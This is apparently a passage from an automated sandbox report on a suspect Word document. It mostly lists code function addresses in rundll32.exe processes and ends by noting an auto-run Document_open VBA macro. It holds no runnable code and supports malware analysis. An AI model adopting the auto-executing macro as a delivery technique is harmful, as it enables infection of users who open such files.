Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021A094	10_2_0021A094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020F099	10_2_0020F099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020B0E1	10_2_0020B0E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00219AE2	10_2_00219AE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00207AE4	10_2_00207AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021A2EA	10_2_0021A2EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020DEC9	10_2_0020DEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002168CB	10_2_002168CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020D2CE	10_2_0020D2CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002112D1	10_2_002112D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002176D5	10_2_002176D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020E924	10_2_0020E924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020BB28	10_2_0020BB28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020792C	10_2_0020792C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00215D36	10_2_00215D36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00210705	10_2_00210705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00205D0E	10_2_00205D0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00218313	10_2_00218313
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00212513	10_2_00212513
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00215B60	10_2_00215B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00218978	10_2_00218978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00206342	10_2_00206342
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00213745	10_2_00213745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00202746	10_2_00202746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00208F55	10_2_00208F55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020DB5B	10_2_0020DB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021C95E	10_2_0021C95E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00204D5F	10_2_00204D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002081A0	10_2_002081A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020B3A2	10_2_0020B3A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00203FAB	10_2_00203FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002067AC	10_2_002067AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021CBB0	10_2_0021CBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020FFB5	10_2_0020FFB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002059B8	10_2_002059B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020EF80	10_2_0020EF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00208994	10_2_00208994
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00203B97	10_2_00203B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0021B19F	10_2_0021B19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002139E1	10_2_002139E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002033F4	10_2_002033F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020B7F8	10_2_0020B7F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020C3C2	10_2_0020C3C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A4460	11_2_006A4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A0065	11_2_006A0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A1079	11_2_006A1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069E871	11_2_0069E871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069C44B	11_2_0069C44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00697C4A	11_2_00697C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00693C28	11_2_00693C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00696005	11_2_00696005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069A4E1	11_2_0069A4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A5CCB	11_2_006A5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069BCA5	11_2_0069BCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006AC48F	11_2_006AC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069E499	11_2_0069E499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A9494	11_2_006A9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A7D78	11_2_006A7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006ABD5E	11_2_006ABD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069415F	11_2_0069415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00696D2C	11_2_00696D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00693521	11_2_00693521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069DD24	11_2_0069DD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A5136	11_2_006A5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069510E	11_2_0069510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A1913	11_2_006A1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A2DE1	11_2_006A2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A41AD	11_2_006A41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006975A0	11_2_006975A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00694DB8	11_2_00694DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006AB59B	11_2_006AB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006AA59F	11_2_006AA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00697D94	11_2_00697D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069CA68	11_2_0069CA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00696A6F	11_2_00696A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069367A	11_2_0069367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A8279	11_2_006A8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A1E7D	11_2_006A1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A6E50	11_2_006A6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00690A00	11_2_00690A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A2A00	11_2_006A2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006B1600	11_2_006B1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00692A18	11_2_00692A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A96EA	11_2_006A96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A8EE2	11_2_006A8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00696EE4	11_2_00696EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069D2C9	11_2_0069D2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069C6CE	11_2_0069C6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A06D1	11_2_006A06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A6AD5	11_2_006A6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A66AE	11_2_006A66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A02A0	11_2_006A02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00695EBA	11_2_00695EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006B12B6	11_2_006B12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006906B6	11_2_006906B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069628A	11_2_0069628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069D760	11_2_0069D760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A4F60	11_2_006A4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A4B48	11_2_006A4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00695742	11_2_00695742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00691B46	11_2_00691B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A2B45	11_2_006A2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069CF5B	11_2_0069CF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00698355	11_2_00698355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069AF28	11_2_0069AF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A473C	11_2_006A473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069FB05	11_2_0069FB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069EF04	11_2_0069EF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A7713	11_2_006A7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00698B16	11_2_00698B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006A9BE4	11_2_006A9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069ABF8	11_2_0069ABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006977F0	11_2_006977F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006927F4	11_2_006927F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069B7C2	11_2_0069B7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006933AB	11_2_006933AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00695BAC	11_2_00695BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069A7A2	11_2_0069A7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006ABFB0	11_2_006ABFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069F3B5	11_2_0069F3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0069E380	11_2_0069E380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00692F97	11_2_00692F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00716C05	12_2_00716C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00716E8A	12_2_00716E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071E360	12_2_0071E360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00725748	12_2_00725748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072533C	12_2_0072533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00714121	12_2_00714121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00719716	12_2_00719716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071FB04	12_2_0071FB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007183F0	12_2_007183F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072A7E4	12_2_0072A7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00724DAD	12_2_00724DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072C19B	12_2_0072C19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071F471	12_2_0071F471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00721C79	12_2_00721C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071427A	12_2_0071427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00728E79	12_2_00728E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00722A7D	12_2_00722A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00725060	12_2_00725060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00720C65	12_2_00720C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071D668	12_2_0071D668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071766F	12_2_0071766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00727A50	12_2_00727A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071D04B	12_2_0071D04B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071884A	12_2_0071884A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00714828	12_2_00714828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00713618	12_2_00713618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00711600	12_2_00711600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00723600	12_2_00723600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00729AE2	12_2_00729AE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071B0E1	12_2_0071B0E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00717AE4	12_2_00717AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072A2EA	12_2_0072A2EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007212D1	12_2_007212D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007276D5	12_2_007276D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071DEC9	12_2_0071DEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007268CB	12_2_007268CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071D2CE	12_2_0071D2CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007112B6	12_2_007112B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00716ABA	12_2_00716ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00720EA0	12_2_00720EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071C8A5	12_2_0071C8A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007272AE	12_2_007272AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072A094	12_2_0072A094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071F099	12_2_0071F099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072D08F	12_2_0072D08F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00728978	12_2_00728978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00725B60	12_2_00725B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00718F55	12_2_00718F55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071DB5B	12_2_0071DB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072C95E	12_2_0072C95E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00714D5F	12_2_00714D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00716342	12_2_00716342
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00712746	12_2_00712746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00723745	12_2_00723745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00725D36	12_2_00725D36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071E924	12_2_0071E924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071BB28	12_2_0071BB28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071792C	12_2_0071792C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00728313	12_2_00728313
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00722513	12_2_00722513
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00720705	12_2_00720705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00715D0E	12_2_00715D0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007133F4	12_2_007133F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071B7F8	12_2_0071B7F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007239E1	12_2_007239E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071C3C2	12_2_0071C3C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072CBB0	12_2_0072CBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071FFB5	12_2_0071FFB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007159B8	12_2_007159B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007181A0	12_2_007181A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071B3A2	12_2_0071B3A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00713FAB	12_2_00713FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007167AC	12_2_007167AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00718994	12_2_00718994
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00713B97	12_2_00713B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072B19F	12_2_0072B19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071EF80	12_2_0071EF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6005	13_2_001D6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D3C28	13_2_001D3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DC44B	13_2_001DC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D7C4A	13_2_001D7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E1079	13_2_001E1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DE871	13_2_001DE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E0065	13_2_001E0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E4460	13_2_001E4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DE499	13_2_001DE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E9494	13_2_001E9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EC48F	13_2_001EC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DBCA5	13_2_001DBCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E5CCB	13_2_001E5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DA4E1	13_2_001DA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E1913	13_2_001E1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D510E	13_2_001D510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E5136	13_2_001E5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6D2C	13_2_001D6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DDD24	13_2_001DDD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D3521	13_2_001D3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EBD5E	13_2_001EBD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D415F	13_2_001D415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E7D78	13_2_001E7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EA59F	13_2_001EA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EB59B	13_2_001EB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D7D94	13_2_001D7D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D4DB8	13_2_001D4DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E41AD	13_2_001E41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D75A0	13_2_001D75A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E2DE1	13_2_001E2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D2A18	13_2_001D2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D0A00	13_2_001D0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E2A00	13_2_001E2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F1600	13_2_001F1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E6E50	13_2_001E6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E1E7D	13_2_001E1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D367A	13_2_001D367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E8279	13_2_001E8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6A6F	13_2_001D6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DCA68	13_2_001DCA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D628A	13_2_001D628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D5EBA	13_2_001D5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F12B6	13_2_001F12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D06B6	13_2_001D06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E66AE	13_2_001E66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E02A0	13_2_001E02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E6AD5	13_2_001E6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E06D1	13_2_001E06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DC6CE	13_2_001DC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DD2C9	13_2_001DD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E96EA	13_2_001E96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6EE4	13_2_001D6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E8EE2	13_2_001E8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D8B16	13_2_001D8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E7713	13_2_001E7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DFB05	13_2_001DFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DEF04	13_2_001DEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E473C	13_2_001E473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DAF28	13_2_001DAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DCF5B	13_2_001DCF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D8355	13_2_001D8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E4B48	13_2_001E4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D1B46	13_2_001D1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E2B45	13_2_001E2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D5742	13_2_001D5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DD760	13_2_001DD760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E4F60	13_2_001E4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D2F97	13_2_001D2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DE380	13_2_001DE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DF3B5	13_2_001DF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EBFB0	13_2_001EBFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D5BAC	13_2_001D5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D33AB	13_2_001D33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DA7A2	13_2_001DA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DB7C2	13_2_001DB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DABF8	13_2_001DABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D27F4	13_2_001D27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D77F0	13_2_001D77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E9BE4	13_2_001E9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00216C05	14_2_00216C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00216E8A	14_2_00216E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00214121	14_2_00214121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0022533C	14_2_0022533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021FB04	14_2_0021FB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00219716	14_2_00219716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021E360	14_2_0021E360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00225748	14_2_00225748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00214D5F	14_2_00214D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00224DAD	14_2_00224DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0022C19B	14_2_0022C19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0022A7E4	14_2_0022A7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_002183F0	14_2_002183F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00214828	14_2_00214828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00211600	14_2_00211600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00223600	14_2_00223600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00213618	14_2_00213618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00225060	14_2_00225060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00220C65	14_2_00220C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021D668	14_2_0021D668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021766F	14_2_0021766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021F471	14_2_0021F471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00221C79	14_2_00221C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021427A	14_2_0021427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00228E79	14_2_00228E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00222A7D	14_2_00222A7D

Source: Doc.doc	OLE, VBA macro line: Private Sub Document_open()
